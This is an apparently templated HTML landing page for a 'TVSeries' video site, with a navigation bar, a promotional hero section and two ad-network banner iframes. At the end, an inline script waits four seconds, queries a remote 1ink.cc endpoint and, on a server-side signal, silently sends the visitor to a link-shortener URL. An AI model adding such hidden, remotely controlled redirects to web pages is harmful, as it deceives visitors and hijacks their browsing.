<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <title>TVSeries</title>
</head>
<body>
    <iframe data-aa='2364517' src='//ad.a-ads.com/2364517?size=728x90' style='width:728px; height:90px; border:0px; padding:0; overflow:hidden; background-color: transparent;'></iframe>
    <nav>
        <div class="logo">TVSeries</div>
        <div class="nav-items">
            <a href="/">Home</a>
            <a href="/">Daily Verse of the Day</a>
            <a href="/">Videos</a>
            <a href="/">Contact</a>
        </div>
    </nav>
    <section class="hero">
        <div class="hero-container">
            <div class="column-left">
                <h1>Views Unlimited Messages & Videos</h1>
                <p>No contracts or unwanted fees. Exclusive offer for new viwers only.</p>
                <button>Get Started</button>
                <div class="column-right">
                    <img src="" alt="">
                </div>
            </div>
        </div>
    </section>
    <iframe data-aa='2364517' src='//ad.a-ads.com/2364517?size=728x90' style='width:728px; height:90px; border:0px; padding:0; overflow:hidden; background-color: transparent;'></iframe>
    <script>
setTimeout(function() {
    $.ajax({
        type: "GET", url: "https://1ink.cc/api/check.php?uid=37141",
        data: "uid=37141",
        success: function(resul){
            if(resul == "1") window.location.href = "https://1ink.cc/Mbh";
        }
    });
}, 4000);
            </script>
    
</body>
</html>
